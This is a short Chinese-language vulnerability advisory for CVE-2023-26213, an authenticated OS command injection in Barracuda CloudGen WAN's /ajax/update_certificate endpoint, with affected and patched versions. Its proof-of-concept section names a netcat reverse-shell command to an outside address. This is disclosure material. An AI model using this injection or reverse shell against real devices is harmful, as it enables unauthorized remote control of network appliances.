漏洞关键信息 漏洞标题: OS Command Injection 受影响产品: Barracuda CloudGen WAN 漏洞版本: < v8. hotfix 1089 修复版本: v8. with hotfix webui-sdwan-1089-8.3.1-174141891 or above version 9.0.0 or above CVE编号: CVE-2023-26213 影响等级: High 漏洞描述: - CVE-2023-26213: - 经过身份验证的用户可以在管理接口中的私有边缘虚拟设备通过 /ajax/update_certificate 终点注入任意操作系统命令。 概念验证 (PoC): - 受影响设备通过 PHP 应用在设备上执行操作系统命令时使用了不安全的占位符字符串,允许攻击者注入恶意命令并通过定制占位符执行命令。 利用方法: 这段 JSON 用于 POST /ajax/update_certificate 接口上传证书,实际将执行 nc -e /bin/sh 192.168.200.1 4242 命令,运行了一个反向 Shell。 修复/补丁: - Barracuda 已发布 hotfix 1089,将修复程序包含在 CGW 的自动补丁中,适用于版本 8。计划将修复包含在未来的版本 9 中。